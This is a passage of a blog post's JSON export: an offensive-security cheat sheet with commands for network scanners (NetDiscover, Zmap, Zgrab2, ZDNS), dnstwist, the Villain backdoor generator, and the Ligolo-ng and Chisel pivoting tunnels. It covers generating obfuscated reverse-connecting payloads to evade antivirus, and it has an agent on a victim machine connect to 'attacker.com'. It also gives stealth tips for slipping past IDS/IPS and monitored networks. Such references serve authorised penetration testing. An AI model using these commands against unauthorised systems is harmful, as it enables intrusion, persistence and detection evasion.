\/>\n<p><strong>NetDiscover<\/strong> &#8211; Active\/passive ARP reconnaissance tool [<a href=\"https:\/\/github.com\/netdiscover-scanner\/netdiscover\">Link<\/a>].<\/p>\n<pre>netdiscover -h\r\nsudo netdiscover -r 192.168.1.0\/24\r\nsudo netdiscover -p\r\nsudo netdiscover -i eth0\r\nsudo netdiscover -i eth0 -P -N<\/pre>\n<p><strong>Note:<\/strong> use <strong>-P<\/strong> and <strong>-N<\/strong> when piping the output into another application: results are printed in plain text without headers. To be stealthy, scan in passive mode with <strong>-p<\/strong>: it only sniffs ARP traffic and sends nothing that could announce its presence to an IDS\/IPS, at the cost of only seeing hosts that happen to talk while you listen.<\/p>\n<hr id=\"Zmap\" \/>\n<p><strong>Zmap<\/strong> &#8211; A fast, stateless single-packet network scanner from the ZMap Project; it probes one port across a large address range and reports the hosts that answer [<a href=\"https:\/\/github.com\/zmap\/zmap\">Link<\/a>]. It is very noisy and has no rate control beyond <code>-B<\/code>, so keep a blocklist of addresses you must not touch.<\/p>\n<pre>sudo apt install zmap -y\r\nsudo zmap -p 443 -o results.csv 10.0.0.0\/8\r\nsudo zmap -p 443 -B 10M -N 1000 -w targets.txt -b blocklist.txt<\/pre>\n<p><code>-B<\/code> caps the send bandwidth, <code>-N<\/code> stops after that many results, <code>-w<\/code> restricts the scan to the listed ranges and <code>-b<\/code> excludes the listed ranges.<\/p>\n<hr id=\"Zgrab\" \/>\n<p><strong>Zgrab<\/strong> &#8211; The ZMap Project&#8217;s application-layer scanner (the current version is zgrab2); it takes the hosts that zmap found and grabs banners or performs protocol handshakes (HTTP, TLS, SSH, FTP, SMTP and more) [<a href=\"https:\/\/github.com\/zmap\/zgrab2\">Link<\/a>].<\/p>\n<pre>git clone https:\/\/github.com\/zmap\/zgrab2 &amp;&amp; cd zgrab2 &amp;&amp; make\r\nsudo zmap -p 443 10.0.0.0\/8 | .\/zgrab2 tls --port 443 --output-file tls.json\r\n.\/zgrab2 http --port 80 --input-file hosts.txt --output-file http.json<\/pre>\n<p>Targets are read from stdin (one IP per line, which is what zmap prints) or from <code>--input-file<\/code>; results are one JSON object per host.<\/p>\n<hr id=\"ZDNS\" \/>\n<p><strong>ZDNS<\/strong> &#8211; A fast DNS lookup tool from the ZMap Project that reads names from stdin and emits one JSON object per lookup [<a href=\"https:\/\/github.com\/zmap\/zdns\">Link<\/a>].<\/p>\n<pre>go install github.com\/zmap\/zdns@latest\r\necho example.com | zdns A\r\ncat subdomains.lst | zdns A --name-servers=1.1.1.1,8.8.8.8 --output-file results.json<\/pre>\n<hr id=\"Villain\" \/>\n<p><strong>Villain<\/strong> &#8211; A backdoor generator and multi-session handler for Windows and Linux [<a href=\"https:\/\/github.com\/t3l3machus\/Villain\">Link<\/a>]. 
It supports collaborative engagements: several Villain instances (siblings) connect to each other over an encrypted channel and share their sessions across the same or different network segments.<\/p>\n<pre>git clone https:\/\/github.com\/t3l3machus\/Villain\r\ncd .\/Villain\r\npip3 install -r requirements.txt\r\nsudo python3 Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]<\/pre>\n<p>Commands<\/p>\n<ul>\n<li>help\n<ul>\n<li>Shows commands and usage information.<\/li>\n<\/ul>\n<\/li>\n<li>generate os=windows lhost=eth0\n<ul>\n<li>Generates a payload for Windows that connects back to the IP of the given network interface (eth0 for instance).<\/li>\n<\/ul>\n<\/li>\n<li>generate os=windows lhost=eth0 obfuscate\n<ul>\n<li>Same as above, with the payload obfuscated to evade string-based antivirus signatures.<\/li>\n<\/ul>\n<\/li>\n<li>sessions\n<ul>\n<li>Lists active sessions.<\/li>\n<\/ul>\n<\/li>\n<li>shell 897df98-7a897f0a-98d7f98\n<ul>\n<li>Connects to a session by its session ID.<\/li>\n<\/ul>\n<\/li>\n<li>exec ~\/script.ps1 897df98-7a897f0a-98d7f98\n<ul>\n<li>Executes a PowerShell script against a Windows session.<\/li>\n<\/ul>\n<\/li>\n<li>connect 192.168.111.111\n<ul>\n<li>Connects to another server instance. The peer must approve the connection within 10 seconds.<\/li>\n<\/ul>\n<\/li>\n<li>siblings\n<ul>\n<li>Lists the connected sibling servers.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr id=\"dnsTwist\" \/>\n<p><strong>dnsTwist<\/strong> &#8211; A domain-name permutation engine for finding registered typo-squatting, homoglyph and bit-squatting look-alikes of a domain [<a href=\"https:\/\/github.com\/elceef\/dnstwist\">Link<\/a>].<\/p>\n<pre>sudo apt install dnstwist -y\r\ndnstwist domain.com\r\ndnstwist -r domain.com\r\ndnstwist -r -m -g --format csv domain.com &gt; typosquats.csv<\/pre>\n<p><code>-r<\/code> shows only permutations that are actually registered, <code>-m<\/code> checks whether their MX hosts could catch mistyped e-mail, and <code>-g<\/code> adds GeoIP information.<\/p>\n<hr id=\"Ligolong\" \/>\n<p><strong>Ligolo-ng<\/strong> &#8211; A reverse VPN for pivoting (lateral movement) in a pentest engagement, written in Go [<a href=\"https:\/\/github.com\/nicocha30\/ligolo-ng\">Link<\/a>]. 
The attacker machine is the server; the agent on the internal network, which usually sits behind a NAT, connects back to it. The communication is encrypted with TLS and hard to distinguish from regular HTTPS traffic. It creates a TUN interface in userland, so any tool can reach the pivoted network without proxychains, and it also supports IPv6.<\/p>\n<p><strong>From the attacker machine &#8211; Server<\/strong><\/p>\n<pre>go build -o proxy cmd\/proxy\/main.go\r\nsudo ip tuntap add user $(whoami) mode tun ligolo\r\nsudo ip link set ligolo up\r\nsudo ufw allow 80,443\/tcp\r\n.\/proxy -autocert -laddr 0.0.0.0:443<\/pre>\n<p><strong>Note:<\/strong> <code>-autocert<\/code> automatically requests a Let&#8217;s Encrypt certificate, which makes the listener look legitimate on Internet-facing infrastructure and monitored networks; port 80 must be reachable to satisfy the Let&#8217;s Encrypt challenge, and <code>-allow-domains<\/code> restricts the names a certificate is issued for. Alternatively <code>-selfcert<\/code> generates a self-signed certificate, in which case the agent needs <code>-ignore-cert<\/code> to skip verification.<\/p>\n<p><strong>From the victim machine &#8211; Client \/ Agent<\/strong><\/p>\n<pre>go build -o agent cmd\/agent\/main.go\r\n.\/agent -connect attacker.com:443\r\n.\/agent -connect attacker.com:443 -ignore-cert<\/pre>\n<p><strong>Operating<\/strong><\/p>\n<p>Once the agent has connected, on the proxy (server side) select the session, inspect the agent&#8217;s interfaces, start the tunnel, and only then add a route for the internal subnet (here <code>10.0.0.0\/24<\/code>) through the <code>ligolo<\/code> interface:<\/p>\n<pre>&gt;&gt; session\r\n&gt;&gt; ifconfig\r\n&gt;&gt; start\r\n&gt;&gt; listener_list\r\n&gt;&gt; listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp\r\n&gt;&gt; stop<\/pre>\n<pre>sudo ip route add 10.0.0.0\/24 dev ligolo<\/pre>\n<p><code>listener_add<\/code> opens a port on the agent and forwards it back to the attacker machine, which is how reverse shells and file transfers from hosts deeper in the network reach you.<\/p>\n<hr id=\"Chisel\" \/>\n<p><strong>Chisel<\/strong> &#8211; A single Go executable containing both client and server; it tunnels traffic inside HTTP(S) WebSocket connections, which blends in well on monitored networks [<a href=\"https:\/\/github.com\/jpillora\/chisel\">Link<\/a>]. 
It supports multiple simultaneous tunnels, SOCKS5 and reverse tunnels, and TLS with certificates issued automatically by Let&#8217;s Encrypt (<code>--tls-domain<\/code>).<\/p>\n<pre>sudo apt install chisel -y<\/pre>\n<p>OR<\/p>\n<pre>go install github.com\/jpillora\/chisel@latest<\/pre>\n<p>On the attacker side: Server<\/p>\n<pre>chisel server -p 80 --reverse\r\nchisel server -p 443 --reverse --tls-domain example.com\r\nchisel server -p 443 --reverse --tls-domain example.com --auth user:StrongPassword<\/pre>\n<p>On the pivot side: Client<\/p>\n<pre>chisel client 200.200.200.200:80 R:socks\r\nchisel client https:\/\/example.com:443 R:0.0.0.0:1080:socks\r\nchisel client --auth user:StrongPassword --fingerprint &lt;server-fingerprint&gt; https:\/\/example.com:443 R:socks<\/pre>\n<p><code>--reverse<\/code> must be set on the server for clients to open reverse tunnels; <code>R:socks<\/code> then starts a SOCKS5 proxy on the server (port 1080 by default) whose traffic exits through the client, so the attacker side can point <code>proxychains<\/code> or a browser at the internal network. Without <code>--auth<\/code> anyone who finds the listener can open tunnels through it, and the fingerprint the server prints at start-up lets the client pin the server key with <code>--fingerprint<\/code>. When <code>--tls-domain<\/code> is used, connect with the hostname on the certificate rather than the bare IP.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reference List MassDNS ShuffleDNS DNSProbe Amass Jok3r Medusa Ncrack SubBrute Steghide StegCracker Zsteg Exiv2 Binwalk [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-1838","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1838","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1838"}],"version-history":[{"count":38,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1838\/revisions"}],"predecessor-version":[{"id":3963,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1838\/revisions\/3963"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1838"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post
=1838"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1838"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}